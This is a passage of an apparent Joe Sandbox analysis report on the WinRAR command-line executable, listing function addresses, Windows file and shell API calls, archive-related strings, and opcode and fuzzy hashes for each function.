                                                                                                                                                                      control_flow_graph 1894 7ff6ee751e80-7ff6ee751ebb call 7ff6ee78a5a0 1897 7ff6ee751ebd-7ff6ee751ec1 1894->1897 1898 7ff6ee751ec8 1894->1898 1897->1898 1899 7ff6ee751ec3-7ff6ee751ec6 1897->1899 1900 7ff6ee751ecb-7ff6ee751f57 CreateFileW 1898->1900 1899->1900 1901 7ff6ee751fcd-7ff6ee751fd1 1900->1901 1902 7ff6ee751f59-7ff6ee751f76 GetLastError call 7ff6ee764534 1900->1902 1903 7ff6ee751ff7-7ff6ee75200f 1901->1903 1904 7ff6ee751fd3-7ff6ee751fd7 1901->1904 1912 7ff6ee751fba 1902->1912 1913 7ff6ee751f78-7ff6ee751fb6 CreateFileW GetLastError 1902->1913 1907 7ff6ee752027-7ff6ee75204b call 7ff6ee78a610 1903->1907 1908 7ff6ee752011-7ff6ee752022 call 7ff6ee77a9e8 1903->1908 1904->1903 1906 7ff6ee751fd9-7ff6ee751ff1 SetFileTime 1904->1906 1906->1903 1908->1907 1914 7ff6ee751fbf-7ff6ee751fc1 1912->1914 1913->1901 1916 7ff6ee751fb8 1913->1916 1914->1901 1917 7ff6ee751fc3 1914->1917 1916->1914 1917->1901
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$CreateErrorLast$Time
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1999340476-0
                                                                                                                                                                      • Opcode ID: 892e3554a84f7d5f3af4d66201b4842f90aabb2a874f58c4d931fe245cb08f10
                                                                                                                                                                      • Instruction ID: cc05663bab7e968e08190eee9f9e928b98d66bba2e9b7dfed25dac2f644fb595
                                                                                                                                                                      • Opcode Fuzzy Hash: 892e3554a84f7d5f3af4d66201b4842f90aabb2a874f58c4d931fe245cb08f10
                                                                                                                                                                      • Instruction Fuzzy Hash: 4D414673A1968106FF608B24E4057AA6691A764BB8F110734EE7D836C8DFBEC459CB05
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE746AD0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 113COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: swprintf
                                                                                                                                                                      • String ID: rar.ini$switches=$switches_%ls=
                                                                                                                                                                      • API String ID: 233258989-2235180025
                                                                                                                                                                      • Opcode ID: 7d70d85aa57c4b2adeedb5d1110c6c2e0691d0eb838de4c05f034f10faa9e0d3
                                                                                                                                                                      • Instruction ID: 50dc6a9bbe93f0d9a9cbc102029c390884d004d24e28f0f968516ff37904f386
                                                                                                                                                                      • Opcode Fuzzy Hash: 7d70d85aa57c4b2adeedb5d1110c6c2e0691d0eb838de4c05f034f10faa9e0d3
                                                                                                                                                                      • Instruction Fuzzy Hash: 9D41D523A1C64241EF14DB60E4102F923A0FF65794F420536FA9D836D9EFBED566C309
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE767E20 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 102COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressHandleModuleProcsetbuf$ErrorLibraryLoadModeVersion
                                                                                                                                                                      • String ID: rar.lng
                                                                                                                                                                      • API String ID: 553376247-2410228151
                                                                                                                                                                      • Opcode ID: aae33f096e44b7179777c7a4e7d7280ac8be15058bdc46fbde8d3aab13c1519a
                                                                                                                                                                      • Instruction ID: 2d6d45bd32b3814d69d135b289b8064ff9a1be1c073d5a51e13957fc9da7b9a0
                                                                                                                                                                      • Opcode Fuzzy Hash: aae33f096e44b7179777c7a4e7d7280ac8be15058bdc46fbde8d3aab13c1519a
                                                                                                                                                                      • Instruction Fuzzy Hash: 5541AF23A1C68342EF10AB20E4017B923919F75794F460035F95E8B2D7DEAFA466C70A
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE7640A4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • SHGetMalloc.SHELL32(?,00000800,?,00007FF6EE764432,?,?,?,?,00000800,00000000,00000000,00007FF6EE7638CB,?,?,?,00007FF6EE7641EC), ref: 00007FF6EE7640C4
                                                                                                                                                                      • SHGetSpecialFolderLocation.SHELL32(?,?,?,?,00000800,00000000,00000000,00007FF6EE7638CB,?,?,?,00007FF6EE7641EC), ref: 00007FF6EE7640DF
                                                                                                                                                                      • SHGetPathFromIDListW.SHELL32 ref: 00007FF6EE7640F1
                                                                                                                                                                        • Part of subcall function 00007FF6EE753458: CreateDirectoryW.KERNEL32(00000800,00000000,?,00007FF6EE76413F,?,?,?,?,00000800,00000000,00000000,00007FF6EE7638CB,?,?,?,00007FF6EE7641EC), ref: 00007FF6EE7534A0
                                                                                                                                                                        • Part of subcall function 00007FF6EE753458: CreateDirectoryW.KERNEL32(00000800,00000000,?,00007FF6EE76413F,?,?,?,?,00000800,00000000,00000000,00007FF6EE7638CB,?,?,?,00007FF6EE7641EC), ref: 00007FF6EE7534D5
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateDirectory$FolderFromListLocationMallocPathSpecial
                                                                                                                                                                      • String ID: WinRAR
                                                                                                                                                                      • API String ID: 977838571-3970807970
                                                                                                                                                                      • Opcode ID: 415bfa020dc0990cad3e0501dba2d99d0bb0d0c3ec71343b5049903f98ccb042
                                                                                                                                                                      • Instruction ID: ddf412577455636cf5ab89a58f0508af55176e0aee4bf2c55b6f8afcea9d3f67
                                                                                                                                                                      • Opcode Fuzzy Hash: 415bfa020dc0990cad3e0501dba2d99d0bb0d0c3ec71343b5049903f98ccb042
                                                                                                                                                                      • Instruction Fuzzy Hash: 6A218013A08B4240EF549F22E8402BA5360BFA9BD4F061031EF0E87359EE7ED465C605
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE751C74 Relevance: 6.1, APIs: 4, Instructions: 55fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast$FileHandleRead
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2244327787-0
                                                                                                                                                                      • Opcode ID: 3b78d4ed6aa6b5a120351a24eca7d2297273107fe5a6a7e720e5693830f3c1e4
                                                                                                                                                                      • Instruction ID: c28c70115258fe0063e39958251d96c60a06b5380c9f175159cabc126695bd5c
                                                                                                                                                                      • Opcode Fuzzy Hash: 3b78d4ed6aa6b5a120351a24eca7d2297273107fe5a6a7e720e5693830f3c1e4
                                                                                                                                                                      • Instruction Fuzzy Hash: 0021C923E08E5681EF604B21E40033963A2BF61B96F114535F95DC76C8CEAFD869C74B
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE7449F8 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 205COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: AFUM$default.sfx
                                                                                                                                                                      • API String ID: 0-2491287583
                                                                                                                                                                      • Opcode ID: 9c5250dc79f526f8b88a1db49316f6b7f6f5dd8f7a69fa39e4eeb80febe8b362
                                                                                                                                                                      • Instruction ID: 8db3729fc002ad16cdd6164b235cac3b3ee7842daebcfd9cde3d85edd15308f2
                                                                                                                                                                      • Opcode Fuzzy Hash: 9c5250dc79f526f8b88a1db49316f6b7f6f5dd8f7a69fa39e4eeb80febe8b362
                                                                                                                                                                      • Instruction Fuzzy Hash: 4781A823A0C69240FF609B11D5003B92292AF71745F464032FA8D876C5EFAF94E6D71E
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE7965BC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileHandleType
                                                                                                                                                                      • String ID: @
                                                                                                                                                                      • API String ID: 3000768030-2766056989
                                                                                                                                                                      • Opcode ID: ac2df8724446a0d51fe7f393cd596ff3ce055ba98acd5cb21c7dcdd1beef0449
                                                                                                                                                                      • Instruction ID: 735a6455fa25cab6461c4565f355508bde57c4efe5e33d97fc3f6ca264ea0ce4
                                                                                                                                                                      • Opcode Fuzzy Hash: ac2df8724446a0d51fe7f393cd596ff3ce055ba98acd5cb21c7dcdd1beef0449
                                                                                                                                                                      • Instruction Fuzzy Hash: 71210863A0C74240EF648B64F4902392651EF65730F271335E6AE873D8CE7BD4A1D30A
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE77B9BC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42threadCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Threadwcschr$CreateExceptionPriorityThrow
                                                                                                                                                                      • String ID: CreateThread failed
                                                                                                                                                                      • API String ID: 1217111108-3849766595
                                                                                                                                                                      • Opcode ID: 23f25dd9d767684a47335cfb6564c8d2137849cd663ca384977e916ef4a87e16
                                                                                                                                                                      • Instruction ID: 76d2dd972fbd17215d3734ddfafb87c7d6c74aa86692e99998c419cc9926f63e
                                                                                                                                                                      • Opcode Fuzzy Hash: 23f25dd9d767684a47335cfb6564c8d2137849cd663ca384977e916ef4a87e16
                                                                                                                                                                      • Instruction Fuzzy Hash: 5C11E633A08A4182EF00EB10E8443B97361FFA4785F414032F69D87259EFBEE566C709
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE77BB80 Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CriticalSection$EnterEventLeave
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3094578987-0
                                                                                                                                                                      • Opcode ID: 8fe9f8176e207c020d906139d049f12966b7ba6a10f6a81758c5b7eb42f71044
                                                                                                                                                                      • Instruction ID: 49c18a7351887f78b2af0996d13230958d8e53e49d0d658d08e445b0beceace5
                                                                                                                                                                      • Opcode Fuzzy Hash: 8fe9f8176e207c020d906139d049f12966b7ba6a10f6a81758c5b7eb42f71044
                                                                                                                                                                      • Instruction Fuzzy Hash: 3EF0D623608B4282DF209F21F5442B86762FF98B99F050130EE8D472ADDF6ED525CB05
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE747B44 Relevance: 4.5, APIs: 3, Instructions: 19COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ConsoleFileHandleModeType
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4141822043-0
                                                                                                                                                                      • Opcode ID: b15bfddebd279c5c829c27adb93723b3551ef5d7968acfa0ad204a509e36213f
                                                                                                                                                                      • Instruction ID: d1afb25d53700e0b3d74b1a271afb26cdd842bc665dd9414817be7cfd0c1dd70
                                                                                                                                                                      • Opcode Fuzzy Hash: b15bfddebd279c5c829c27adb93723b3551ef5d7968acfa0ad204a509e36213f
                                                                                                                                                                      • Instruction Fuzzy Hash: D8E0C226F0460343FF584725E86533802519F69B81F411038F80FCE354EEAED4A6C306
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE792488 Relevance: 4.5, APIs: 3, Instructions: 19COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
